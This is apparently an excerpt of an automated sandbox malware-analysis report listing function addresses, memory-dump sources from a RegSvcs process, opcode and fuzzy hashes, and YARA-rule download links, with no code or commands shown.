                                                                                            • Instruction ID: 6836a67ea45bdc362205f6e11efa2aa1004bb9d2c767abd11f148544876ecf6a
                                                                                            • Opcode Fuzzy Hash: 17c2af8b3fdd7328168a311cbd7eb06e57413a805beed2c4f398df1e0f66339a
                                                                                            • Instruction Fuzzy Hash: EF424E75E002198FEB65CF69CC41BADBBF5BF48310F15C09AE589AB282DB349985CF50
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00F82840 Relevance: .6, Instructions: 605COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: b2bf99b9302af65de771f1817e2d26410f085eabb147ea2cec7f18a63ed8626c
                                                                                            • Instruction ID: d7efd248d2773cd81b00c326b85d2eaabcac62b8a786fd91ab9df135aa9f7758
                                                                                            • Opcode Fuzzy Hash: b2bf99b9302af65de771f1817e2d26410f085eabb147ea2cec7f18a63ed8626c
                                                                                            • Instruction Fuzzy Hash: E132AC71A007558BDB24DF69C8547BEBBF3AF84714F28411AE486DB384DB39A842EB50
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00F94A35 Relevance: .4, Instructions: 423COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                                            • Instruction ID: 473a95167a7c40e9bfa4248b1850d23ee43091cde615c956d984bcfadc4afce8
                                                                                            • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                                            • Instruction Fuzzy Hash: 98F17171E0121A9BEF15CF95C990FAEB7F6AF54714F09812AE905AB340E734EC42EB50
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00F7A9D0 Relevance: .4, Instructions: 421COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 8c8ebe877bbc8fdfa011e26e68334ff213c08db03162512b8dcd1ca1baad2208
                                                                                            • Instruction ID: 33be2c822d539b5b6e789233b2a88eeaed9aa85bd7cf923be1dc1aa369cf89f7
                                                                                            • Opcode Fuzzy Hash: 8c8ebe877bbc8fdfa011e26e68334ff213c08db03162512b8dcd1ca1baad2208
                                                                                            • Instruction Fuzzy Hash: 0CE1A372E04219DBEB21DF98C980BAEB7BAAF94310F158427E905E7240D7389D40EB53
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0100892B Relevance: .4, Instructions: 386COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: aaac6a2bcc7d57da3cb1d8486d7a1cb7d5a3a5294d1a0def6c2b703260578a90
                                                                                            • Instruction ID: a50114ff12f9df7307aeeda54dd550aeab2f166352a9e566ae6dbd00eb99036f
                                                                                            • Opcode Fuzzy Hash: aaac6a2bcc7d57da3cb1d8486d7a1cb7d5a3a5294d1a0def6c2b703260578a90
                                                                                            • Instruction Fuzzy Hash: C1D1E371E00A098BEF16CF59C841AFEBBF5BF88314F18C16AD595A7281D735E905CB60
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00F68397 Relevance: .4, Instructions: 380COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 82b30516b3e934bb08539da64a032d0e6c814a4cb09ced8d8e2fb45740f347a2
                                                                                            • Instruction ID: 17e029779c0ad15e9e8a811ffac056df82a5857be43ef14a3c9a2f0618d3aed7
                                                                                            • Opcode Fuzzy Hash: 82b30516b3e934bb08539da64a032d0e6c814a4cb09ced8d8e2fb45740f347a2
                                                                                            • Instruction Fuzzy Hash: 51D1E072A002169BCB14DF24CD82FBA73A5BF54394F14466DF916DB281EF34D942EB50
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00F765D0 Relevance: .4, Instructions: 365COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 04b65550853ae9c84ba038ecb1942d1e856f0dab8dd6b8024e43fc832497eabd
                                                                                            • Instruction ID: fd78f3ca3527622406c7e7d38024107fb51b7f07b6b41c13007b4f13e55045d2
                                                                                            • Opcode Fuzzy Hash: 04b65550853ae9c84ba038ecb1942d1e856f0dab8dd6b8024e43fc832497eabd
                                                                                            • Instruction Fuzzy Hash: 06E17A71908742CFC714DF28C490A6ABBE1FF98318F14896EE999CB351DB31E905DB92
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00FF8243 Relevance: .3, Instructions: 322COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                            • Instruction ID: e41af184ab45a930be7f90e4132130bdeed4842490a78c77e6f230bd002bfee0
                                                                                            • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                            • Instruction Fuzzy Hash: 42B17275A006089FDF24DF94C940ABBB7B9BF84394F144459AA02A77A1EF34FD06EB10
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00F80535 Relevance: .3, Instructions: 300COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                            • Instruction ID: da0f5524e07f7fe7a2adaf742d42286dd72d4a5d559a9511010868dc6bec17f8
                                                                                            • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                            • Instruction Fuzzy Hash: C2B1F632A00646AFDB21EB64C850BFEB7F6AF44310F580165E552DB391DB34EE45EB90
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00F783C0 Relevance: .3, Instructions: 281COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: f9854f08f4b066b60b5cad4b7087747269dd417558b58d42475fe0057fd6d8d9
                                                                                            • Instruction ID: 267d58641675a3f4cd8784ae3c3982488b411dac4df72553a233b19b4af5d895
                                                                                            • Opcode Fuzzy Hash: f9854f08f4b066b60b5cad4b7087747269dd417558b58d42475fe0057fd6d8d9
                                                                                            • Instruction Fuzzy Hash: F1C168746083419FD760CF15C484BABB7E5BF88354F48892EE98987390EB74E909DF92
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00F6C427 Relevance: .3, Instructions: 280COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: a99a915babf277afd3b23896f0336e33ea2dd6938765c4fb674c7d9e224f55d2
                                                                                            • Instruction ID: ac18e200d2eea607c0ef6ff5b50c6aa329b1114b47da965e98fa85ed2a0852b7
                                                                                            • Opcode Fuzzy Hash: a99a915babf277afd3b23896f0336e33ea2dd6938765c4fb674c7d9e224f55d2
                                                                                            • Instruction Fuzzy Hash: A7B1A170A002698BDB24DF64CD80BB9B3B1EF44714F1485E9D48AE7281EB34ED85DF65
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00FB0185 Relevance: .3, Instructions: 276COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: b6e5563eea14bbfe38511c30c8c81ad331867f7bc323573a6495b34d40524c8c
                                                                                            • Instruction ID: 4c02a5c2017c8898525504ab1b3f8526fd49fbec4093cb2dcf17822547486ac9
                                                                                            • Opcode Fuzzy Hash: b6e5563eea14bbfe38511c30c8c81ad331867f7bc323573a6495b34d40524c8c
                                                                                            • Instruction Fuzzy Hash: 64A1D171B00616DBDB24CF66C990BEAB7B1FF54324F14402AEA4597281EF78EC01EB90
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01044500 Relevance: .3, Instructions: 275COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 373d7705ed1b96f455b7ea16979a9a6371161278ccd2200d03e29087bb5e3204
                                                                                            • Instruction ID: 2139321d4a2c84b394dccda5926ca511413ccb76eefc7bc5f07ec3b575462e4f
                                                                                            • Opcode Fuzzy Hash: 373d7705ed1b96f455b7ea16979a9a6371161278ccd2200d03e29087bb5e3204
                                                                                            • Instruction Fuzzy Hash: F5A1B9B2A00611AFD721EF28C981B5ABBE9FF48704F45457CF589DB662C738E901CB91
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01042B57 Relevance: .3, Instructions: 266COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                                                            • Instruction ID: 8cfd3fc0f1a611028c6ef6e9df638767a35ea8b7c9b6700662c96895303f0f37
                                                                                            • Opcode Fuzzy Hash: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                                                            • Instruction Fuzzy Hash: 0EB14AB1E0061ADFDF69DFA9D880AADB7F5BF48300F148179E994A7351D730A941CB90
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00FF60E0 Relevance: .3, Instructions: 264COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: cf0ca532725c7e1ce0f98cd1e30ebfd4e6fbba0dda6ad13b07bfdf6876d3b4d8
                                                                                            • Instruction ID: a09df168a48f53807e4135eae4b2b3a3b7b4ef316f74383cb645d55e326f64f9
                                                                                            • Opcode Fuzzy Hash: cf0ca532725c7e1ce0f98cd1e30ebfd4e6fbba0dda6ad13b07bfdf6876d3b4d8
                                                                                            • Instruction Fuzzy Hash: 1B916071D00219ABDF15DFA8DC85BBEBBB5AF48710F154159E610EB361DB38DD00ABA0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00FA63FF Relevance: .3, Instructions: 261COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 3b056190b913b231f979244df63722cb2d3f76c9bd4f9147c591e849804db139
                                                                                            • Instruction ID: 7653a61f7dfd6eae113e64fa6cd04ff652dc03809a35214b7807fba1b1776928
                                                                                            • Opcode Fuzzy Hash: 3b056190b913b231f979244df63722cb2d3f76c9bd4f9147c591e849804db139
                                                                                            • Instruction Fuzzy Hash: B19143B1E003549BDB35DF15DC45BAA37A0BB4AB64F18012DFA40AB2D1D77DA801F791
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00F8E3F0 Relevance: .3, Instructions: 261COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: a57f6a3ec63f9701565998e141c1dfbe9652652d8076383bc3049c8e6cc57d58
                                                                                            • Instruction ID: 3ddaac85e9289814f94dbd11de217f96a04e4b1b84d84ae878885657c3f10345
                                                                                            • Opcode Fuzzy Hash: a57f6a3ec63f9701565998e141c1dfbe9652652d8076383bc3049c8e6cc57d58
                                                                                            • Instruction Fuzzy Hash: 60911236E046158BDB24FB98C840BBEB7A2EF84724F19406AE805DF391E678DD01EB51
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00FF89B3 Relevance: .3, Instructions: 259COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 4587ab3330010277dffc0d0d759d6e0370ec2cd8963029e9462e9dee53b19187
                                                                                            • Instruction ID: 28add1ffc71ab32adb01d5332ee069c746bb1b1379ac4825d286bff7cc481b6e
                                                                                            • Opcode Fuzzy Hash: 4587ab3330010277dffc0d0d759d6e0370ec2cd8963029e9462e9dee53b19187
                                                                                            • Instruction Fuzzy Hash: 02913872A0531AAFD321DF24CC81B2A77A4EF84794F040418FB806B2A1DB79EC06E791
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00FA4AD0 Relevance: .2, Instructions: 228COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: e9a1a81c142ee4c47b1881e9c1299c2663fdf8bc53de108fc309113f413b6e91
                                                                                            • Instruction ID: 24ff24c09317f985e779f7b69344926d8cd8b7dae23cbd5bca59ea7f55e656bc
                                                                                            • Opcode Fuzzy Hash: e9a1a81c142ee4c47b1881e9c1299c2663fdf8bc53de108fc309113f413b6e91
                                                                                            • Instruction Fuzzy Hash: 7C613772A40B519BC722CF19C84AB2AB3E5EFC1B70F148529F8559B291C774FD01EB91
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00FC6ACC Relevance: .2, Instructions: 226COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
